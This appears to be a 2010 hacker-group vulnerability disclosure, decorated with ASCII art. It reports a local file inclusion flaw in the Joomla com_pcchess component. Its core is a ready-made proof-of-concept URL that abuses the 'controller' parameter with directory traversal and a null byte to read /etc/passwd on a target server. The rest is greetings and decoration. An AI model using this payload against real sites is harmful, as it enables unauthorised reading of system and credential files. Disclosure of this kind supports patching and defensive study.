================================================================================================
================================================================================================
== @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ ==
== @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ ==
== @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ ==
== @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ ==
== @@ @@@@@@ @@@@@@@ @@ @ @@ @@@@@@ @@ @@ @@ @@@@@@ ==
== @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ ==
== @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ ==
== @@ @@@@@@ @@ @@ @@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@ ==
== @@ @@@@@@ @@ @@ @@ @@ @@@@@@@@@@ @@@@@@ @@@@@@ @@ @@ @@@@@@ ==
== ==
================================================================================================
================================================================================================
||| |||
||| |||
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
[[ [[
[[ joomla Component com_pcchess Local File Inclusion Vulnerability [[
[[ [[
[[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ | [[
[[ [[
[[ ## Exploit: index.php?option=com_pcchess&controller=[LFI]%00 [[
[[ [[
[[ ## PoC: [[
[[ [[
[[- http://[target]/[path]/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 [[
[[ [[
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
||| |||
||| |||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~ Greetz and Thanks to: All member gcc, all member manadocoding ~~~~
~~~~ ~~~~
~~~~ MC team : team_elite , devilbat , zreg ~~~~
~~~~ thanks for : cr4wl3r ~~~~
~~~~ ~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* - ,
* - @@
* - @@#
* - :@@;
* - @@@@@ ......`
* - @@@@.@@@@@@@@@@@#
* - @@@@@@@@@@@@@@@@@@`
* - @@@@@@@@@@@@@@@@@@@@;
* - #@@@@@@@@@@@@@@@@@
* - `@@,@@@@@@@@@@@@@@@@@:
* - @@@+@@@@@@@ @@@@@@@;@@@`
* - :@@@@@@@@@:@,; @@@@@@@ .@@
* - @@@@@@@@@@@ : @@@@@@@@ @@
* - @@@@' ` ` @@@@@@@@@: +.
* - .@@ @@@@@@@@@@@ .
* - , +@@@@@@@@@@@@@
* - +@@@@@@@@@@@@@@@@@@@@#
* - ,@@@@@@@@@@@@@@@@@ +@@@
* - `@@@@@@@@@@@@@@@@@@@ @@@
* - @@@@@@@@@@@@@@@@@@@ @@`
* - @@@@@@@@@@@@@@@@@@ @@
* - +@@@@@@@@@@; @@@# @
* - @@@@@@@@@ :
* - @@@@@@@@ ,@@
* - @@@@@@@@@ @@@'
* - @@@@@@@`@ @@@;
* - @@@@@@@ @ @. @@@@@@@@
* - @@@@@@@@@ @@@@@@@@@@@@@#
* - @@@@@@@@@@@@ @@@@@@@@@@@@@@@
* - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@
* - @ @@@@@@@@@@@@@@@@@@@ ,@@@@+
* - @@@@@@@@@@@@@@@@@@@ @@@@
* - @@@ @@@@@@@@@ @@@@@@; @@@@
* - @@ @@@@@@@` @@@ . @@.
* - @@ ; @@@@# :@@@@@# @@.
* - @ @@@: ;@
* - ;` @@ ;@
* - @@ @
* - @ #
* - : :
* --------------------------------------------->>>> bugs found on 08 April 2010 by team_elite.
